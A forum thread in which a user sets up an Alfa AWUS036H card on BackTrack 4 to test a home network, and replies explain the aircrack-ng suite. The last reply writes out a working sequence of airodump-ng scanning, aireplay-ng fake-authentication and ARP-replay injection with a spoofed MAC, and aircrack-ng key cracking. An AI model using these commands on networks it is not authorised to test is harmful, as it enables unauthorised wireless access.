Alfa awus036h Setup Help

well i just got my alfa awus036h card and i go to plug it in go to services network start network and im trying to test my network at home but im having problems getting aircrack started to test it. problem number 1i go to put the alfa card in monitor mode with airmon-ng start wlan0 and it responds with " wlan0 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) " so now im kind of stuck i have been trying to solve this problem for weeks now and am looking for any insite to this problem i have only installed BT4 to my laptop and on done sudo apt-get update if there is something else i need to install or other drivers i need to install or use please sheed some light, thankyou in advance!!!

Pro13 - it appears your new card is working properly. I think you need to study and learn how the aircrack-ng suite of tools work. I recommend you google aircrack-ng and read the material there.

Once you get a sense of how the aircrack-ng suite works, you might want to try this aircrack-ng tutorial on capturing WPA handshakes and cracking. The tutorial walks you through, step-by-step the exact commands you need to enter on your system and in your specific wireless environment. Jot down the commands and then practice them without running the tutorial script.

Study, try to answer your own questions, experiment and have fun.

I'll give you a small hint: you need to use the mon0 interface you created for any further experiments. airodump-ng mon0 is a fun command to try, as it lists all the wifi APs in the neighbourhood, and you can see the channel and BSSID from your accespoint.

aireplay-ng -1 0 -a {AP BSSID} -h 00:11:22:33:44:55 -e linksys mon0

aireplay-ng -3 -b {AP BSSID} -h 00:11:22:33:44:55 mon0

aircrack-ng -b {AP BSSID} test-*.cap
